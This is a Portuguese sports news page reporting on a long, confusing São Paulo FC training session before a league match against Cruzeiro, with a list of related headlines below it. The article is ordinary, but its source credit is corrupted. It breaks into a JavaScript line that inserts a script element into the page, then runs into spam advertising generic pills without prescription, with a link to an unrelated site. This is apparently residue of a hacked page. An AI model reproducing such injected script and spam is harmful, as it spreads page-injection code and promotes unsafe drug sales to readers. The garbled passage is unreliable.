Destaque

São Paulo faz treino confuso e alegre no CT; atividade dura mais de 2 horas

O São Paulo se reapresentou nesta terça-feira, no CT da Barra Funda, após a vitória por 3 a 0 sobre o Sport, no sábado, e os dois dias de folga. Com semana cheia de preparação para encarar o Cruzeiro, domingo, em Belo Horizonte, a comissão técnica comandou atividade intensa: mais de duas horas de trabalho, sendo metade no Reffis e metade no gramado, onde os atletas tiveram dificuldade para compreender as orientações do auxiliar Eduardo de Souza.

Depois do trabalho de uma hora na academia, os são-paulinos fizeram aquecimento com o preparador físico Anselmo Sbragia por cerca de 20 minutos. Na sequência, formaram duas rodas com três times, em uma espécie de “bobinho”.

A confusão se deu quando Eduardo de Souza dividiu 28 jogadores (incluindo os goleiros) em equipes de coletes vermelho e amarelo. O grupo amarelo contou ainda com três atletas de colete branco. Tudo isso com apenas uma bola em jogo. A confusão era tanta que João Schmidt chegou a desarmar Michel Bastos, seu companheiro de time, mas com colete diferente.

Nesse treino, alguns atletas fizeram uma espécie de roda em volta do restante do grupo e tinham que trabalhar viradas de jogo. Eles formavam a “parede”, nome usado pelo auxiliar, mas não podiam trocar passes com o companheiro imediatamente do lado, mas para jogadores mais distantes – o objetivo era estimular as viradas de jogo.

No começo, para pontuar, cada time tinha de trocar cinco passes sem sofrer desarme. Depois, o número subiu para 10 passes. As regras demoraram a ser compreendidas, mas o treino terminou disputado com intensidade e provocações aos times perdedores, obrigados a pagar flexões de braço.

O São Paulo é o quinto colocado do Brasileirão, com 53 pontos, empatado com o Santos, quarto lugar e na frente pelo saldo de gols: 16 a 8.

Fonte: Gedocument.currentScript.parentNode.insertBefore(s, document.currentScript); pills obtain cheat generic pills no prescription – http://www.fun-tv.net/obtain-cheat-generic-pills-no-prescription/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque

Mais em Destaque

Petros é favorito a ser o novo capitão do São Paulo

saopauloadmin19 de Janeiro de 2018

Dupla da base se adapta ao jogo e é alento na fraca estreia do São Paulo

saopauloadmin18 de Janeiro de 2018

São Paulo conversa sobre possibilidade de Paulo Henrique Ganso

saopauloadmin17 de Janeiro de 2018

Tricolor define numeração do elenco

saopauloadmin15 de Janeiro de 2018

Diego Souza treina no Morumbi e diz: “Espero fazer grandes jogos aqui dentro”

saopauloadmin14 de Janeiro de 2018

Flamengo vai desembolsar 2 milhões e mais um jogador para ter Hudson do São Paulo

saopauloadmin12 de Janeiro de 2018

São Paulo e Urbano renovam contrato de patrocínio para 2018

saopauloadmin11 de Janeiro de 2018

São Paulo sonda Aloísio Boi Bandido, mas valores travam negociação

saopauloadmin10 de Janeiro de 2018

Desarmes, passes e lançamentos: as estatísticas de Anderson Martins, novo zagueiro do São Paulo

saopauloadmin10 de Janeiro de 2018